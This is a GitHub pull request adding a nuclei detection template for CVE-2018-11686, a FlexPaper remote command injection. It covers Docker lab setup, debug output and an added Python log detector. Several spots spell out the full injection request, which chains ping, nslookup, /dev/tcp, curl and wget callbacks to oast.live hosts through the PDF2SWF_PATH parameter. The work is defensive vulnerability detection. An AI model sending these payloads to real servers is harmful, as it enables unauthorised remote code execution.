Add CVE-2018-11686 #12389

Open
wants to merge 4 commits into base: main

Conversation

pszyszkowski
Contributor

Template / PR Information

Template for #12369
To create a vulnerable instance, create a Dockerfile with the following content:

FROM php:5.6-apache-stretch
COPY --chown=www-data:www-data ./flexpaper/ /var/www/html/

Get flexpaper:

git clone https://github.com/dw250100785/FlexPaper_2.1.2.git flexpaper

Build and run:

docker build -t flexpaper .
docker run --rm -p 8888:80 flexpaper

Run nuclei:

nuclei -u http://127.0.0.1:8888/ -t ~/git/nuclei-templates/http/cves/2018/CVE-2018-11686.yaml

Template Validation

I've validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)

Debug:

nuclei -u http://127.0.0.1:8888/ -t ~/git/nuclei-templates/http/cves/2018/CVE-2018-11686.yaml -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

                projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.live
[INF] [CVE-2018-11686] Dumped HTTP request for http://127.0.0.1:8888/php/setup.php?step=4&PDF2SWF_PATH=ping%20-c1%20d18esui1sadpsj315g70dwaqi7s3fwnb9.oast.live%20%7c%7c%20nslookup%20d18esui1sadpsj315g70byxtk1xmztc7n.oast.live%20%7c%7c%20echo%201%20%3e%2fdev%2ftcp%2fd18esui1sadpsj315g70aop8yajryszkh.oast.live%2f80%20%7c%7c%20curl%20http%3a%2f%2fd18esui1sadpsj315g70qj597ihyxpmdf.oast.live%20-o%20%2fdev%2fnull%20%7c%7c%20wget%20http%3a%2f%2fd18esui1sadpsj315g70mk41yud4antpy.oast.live%20-O%20%2fdev%2fnull%3b

GET /php/setup.php?step=4&PDF2SWF_PATH=ping%20-c1%20d18esui1sadpsj315g70dwaqi7s3fwnb9.oast.live%20%7c%7c%20nslookup%20d18esui1sadpsj315g70byxtk1xmztc7n.oast.live%20%7c%7c%20echo%201%20%3e%2fdev%2ftcp%2fd18esui1sadpsj315g70aop8yajryszkh.oast.live%2f80%20%7c%7c%20curl%20http%3a%2f%2fd18esui1sadpsj315g70qj597ihyxpmdf.oast.live%20-o%20%2fdev%2fnull%20%7c%7c%20wget%20http%3a%2f%2fd18esui1sadpsj315g70mk41yud4antpy.oast.live%20-O%20%2fdev%2fnull%3b HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2018-11686] Dumped HTTP response http://127.0.0.1:8888/php/setup.php?step=4&PDF2SWF_PATH=ping%20-c1%20d18esui1sadpsj315g70dwaqi7s3fwnb9.oast.live%20%7c%7c%20nslookup%20d18esui1sadpsj315g70byxtk1xmztc7n.oast.live%20%7c%7c%20echo%201%20%3e%2fdev%2ftcp%2fd18esui1sadpsj315g70aop8yajryszkh.oast.live%2f80%20%7c%7c%20curl%20http%3a%2f%2fd18esui1sadpsj315g70qj597ihyxpmdf.oast.live%20-o%20%2fdev%2fnull%20%7c%7c%20wget%20http%3a%2f%2fd18esui1sadpsj315g70mk41yud4antpy.oast.live%20-O%20%2fdev%2fnull%3b

HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Tue, 17 Jun 2025 04:26:46 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.25 (Debian)
Set-Cookie: PHPSESSID=d17c925b4718d50b022b52ed5fb7a29e; path=/
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40


    <!--



    {
    "allowcache":true,
    "splitmode":"false",
    "path.pdf":"G:\\wamp\\www\\FlexPaper\\pdf\\",
    "path.swf":"G:\\wamp\\www\\FlexPaper\\docs\\",
    "renderingorder.primary":null,
    "renderingorder.secondary":null,
    "cmd.conversion.singledoc":"pdf2swf \"{path.pdf}{pdffile}\" -o \"{path.swf}{pdffile}.swf\" -f -T 9 -t -s storeallcharacters -s linknameurl",
    "cmd.conversion.splitpages":"pdf2swf \"{path.pdf}{pdffile}\" -o \"{path.swf}{pdffile}_%.swf\" -f -T 9 -t -s storeallcharacters -s linknameurl",
    "cmd.conversion.renderpage":"swfrender \"{path.swf}{swffile}\" -p {page} -o \"{path.swf}{pdffile}_{page}.png\" -X 1024 -s keepaspectratio",
    "cmd.conversion.rendersplitpage":"swfrender \"{path.swf}{swffile}\" -o \"{path.swf}{pdffile}_{page}.png\" -X 1024 -s keepaspectratio",
    "cmd.conversion.jsonfile":"pdf2json \"{path.pdf}{pdffile}\" -enc UTF-8 -compress \"{path.swf}{pdffile}.js\"",
    "cmd.conversion.splitjsonfile":"pdf2json \"{path.pdf}{pdffile}\" -enc UTF-8 -compress -split 10 \"{path.swf}{pdffile}_%.js\"",
    "cmd.searching.extracttext":"swfstrings \"{swffile}\"",
    "cmd.query.swfwidth":"swfdump {swffile} -X",
    "cmd.query.swfheight":"swfdump \"{swffile}\" -Y",
    "pdf2swf":false,
    "admin.username":"admin",
    "admin.password":"123456",
    "licensekey":"gpl"
    }
    -->


    <br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at /var/www/html/php/lib/config.php:31) in <b>/var/www/html/php/setup.php</b> on line <b>140</b><br />
[d18esui1sadpsj315g70qj597ihyxpmdf] Received DNS interaction from 172.69.49.15 at 2025-06-17 04:26:46
------------
DNS Request
------------

;; opcode: QUERY, status: NOERROR, id: 62173
;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version 0; flags: do; udp: 1452

;; QUESTION SECTION:
;d18esui1sadpsj315g70qj597ihyxpmdf.oast.live.   IN       AAAA



------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 62173
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;d18esui1sadpsj315g70qj597ihyxpmdf.oast.live.   IN       AAAA

;; ANSWER SECTION:
d18esui1sadpsj315g70qj597ihyxpmdf.oast.live.    3600    IN      A       178.128.210.172

;; AUTHORITY SECTION:
d18esui1sadpsj315g70qj597ihyxpmdf.oast.live.    3600    IN      NS      ns1.oast.live.
d18esui1sadpsj315g70qj597ihyxpmdf.oast.live.    3600    IN      NS      ns2.oast.live.

;; ADDITIONAL SECTION:
ns1.oast.live.  3600    IN      A       178.128.210.172
ns2.oast.live.  3600    IN      A       178.128.210.172


[CVE-2018-11686:word-1] [http] [critical] http://127.0.0.1:8888/php/setup.php?step=4&PDF2SWF_PATH=ping%20-c1%20d18esui1sadpsj315g70dwaqi7s3fwnb9.oast.live%20%7c%7c%20nslookup%20d18esui1sadpsj315g70byxtk1xmztc7n.oast.live%20%7c%7c%20echo%201%20%3e%2fdev%2ftcp%2fd18esui1sadpsj315g70aop8yajryszkh.oast.live%2f80%20%7c%7c%20curl%20http%3a%2f%2fd18esui1sadpsj315g70qj597ihyxpmdf.oast.live%20-o%20%2fdev%2fnull%20%7c%7c%20wget%20http%3a%2f%2fd18esui1sadpsj315g70mk41yud4antpy.oast.live%20-O%20%2fdev%2fnull%3b
[INF] Scan completed in 18.145644091s. 1 matches found.

/claim #12369

Additional References:
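
The request shown in the debug output above is also what a defender would hunt for in web-server logs. As an added example (not part of this PR or the nuclei template), the Python below flags FlexPaper setup.php requests whose PDF2SWF_PATH value contains shell metacharacters; the Apache log lines and the probe.interact.example host are constructed.

```python
"""Detect CVE-2018-11686 probes in Apache access logs (added example, not part
of the PR). setup.php?step=4 hands PDF2SWF_PATH to a shell, so a legitimate
value is a bare binary path; shell metacharacters mean command injection."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" format: client ident user [timestamp] "request line" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Characters that turn a "path to pdf2swf" into additional shell commands.
SHELL_META = re.compile(r'[;|&`$<>(){}\n]')

def inspect_line(line):
    """Return a finding dict for a suspicious setup.php request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/php/setup.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    values = params.get("PDF2SWF_PATH")
    if not values:
        return None
    # parse_qs percent-decodes once; decode again so double encoding does not hide metacharacters
    payload = unquote(values[0])
    if not SHELL_META.search(payload):
        return None
    return {"src": m.group("ip"), "time": m.group("ts"), "status": int(m.group("status")),
            "step": params.get("step", [""])[0], "payload": payload}

def scan(lines):
    """Run inspect_line over log lines and keep the hits."""
    return [hit for hit in map(inspect_line, lines) if hit]

# Constructed sample log: a benign configuration save, an injection probe whose
# shape mirrors the request in the debug output above (OAST host replaced by a
# placeholder), and an unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Jun/2025:04:20:01 +0000] "GET /php/setup.php?step=4'
    '&PDF2SWF_PATH=%2Fusr%2Fbin%2Fpdf2swf HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [17/Jun/2025:04:26:46 +0000] "GET /php/setup.php?step=4'
    '&PDF2SWF_PATH=ping%20-c1%20probe.interact.example%20%7c%7c%20echo%201%3b'
    ' HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [17/Jun/2025:04:27:10 +0000] "GET /index.html HTTP/1.1" 200 88 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["src"]} step={hit["step"]} payload={hit["payload"]!r}')
```

Because the vulnerable step returns 200 whether or not the injected command ran, the log check keys on the parameter value rather than the status code.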

@princechaddha
Member

Automated PR Review (Experimental)


Thank you for your contribution! You can join our Discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you once again.

Required Fixes:

  • Fix the spelling of intrusive in the tags list. It is currently spelled instrusive.
  • Ensure the reference section includes links that directly demonstrate exploitation for better alignment with the purpose of this RCE template.

Other Suggestions:

  • It would be beneficial to add a matcher that checks for an expected HTTP status code (such as 200 OK) or a specific response header to improve the reliability of the results and reduce false positives.
  • Consider adding a second matcher based on the response body (e.g., looking for indications that the arbitrary code was executed) to further validate the success of the exploitation.
  • Verify that your callback command in the variables section is compatible with various shell environments, or mention that it might only work in specific contexts.

Please note that I am an AI Template bot, which is still experimental, and the team will review the PR shortly.

@DhiyaneshGeek DhiyaneshGeek self-assigned this Jun 20, 2025
@DhiyaneshGeek DhiyaneshGeek added the Done Ready to merge label Jun 23, 2025
@DhiyaneshGeek
Member

Hi @pszyszkowski,

Thank you for sharing the template and contributing to the Template Project. We appreciate your participation in the Bounty Claim Program!

You can join our Discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you once again!

@DhiyaneshGeek
Member

Validated Locally

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

                projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2018-11686] FlexPaper - Remote Code Execution (@mpgn,@pszyszkowski) [critical]
[INF] Using Interactsh Server: oast.me
[CVE-2018-11686] [http] [critical] http://0.0.0.0:8888/php/setup.php?step=4&PDF2SWF_PATH=ping%20-c1%20d1cqg9dl6um7ujiti1qgfc9gh4tgscahs.oast.me%20%7c%7c%20nslookup%20d1cqg9dl6um7ujiti1qgac9k7h4y8yjdi.oast.me%20%7c%7c%20echo%201%20%3e%2fdev%2ftcp%2fd1cqg9dl6um7ujiti1qghc8cjdn3d1nqg.oast.me%2f80%20%7c%7c%20curl%20http%3a%2f%2fd1cqg9dl6um7ujiti1qghg9wfn9w89yrm.oast.me%20-o%20%2fdev%2fnull%20%7c%7c%20wget%20http%3a%2f%2fd1cqg9dl6um7ujiti1qgocqdcy9jt7jhm.oast.me%20-O%20%2fdev%2fnull%3b

@DhiyaneshGeek DhiyaneshGeek added the good first issue Good for newcomers label Jun 24, 2025
@DhiyaneshGeek
Member

Hi @pszyszkowski

As a token of appreciation for your valuable contribution, you can grab some cool PD Stickers from here http://nux.gg/stickers.

Labels: 🙋 Bounty claim · Done Ready to merge · good first issue Good for newcomers
3 participants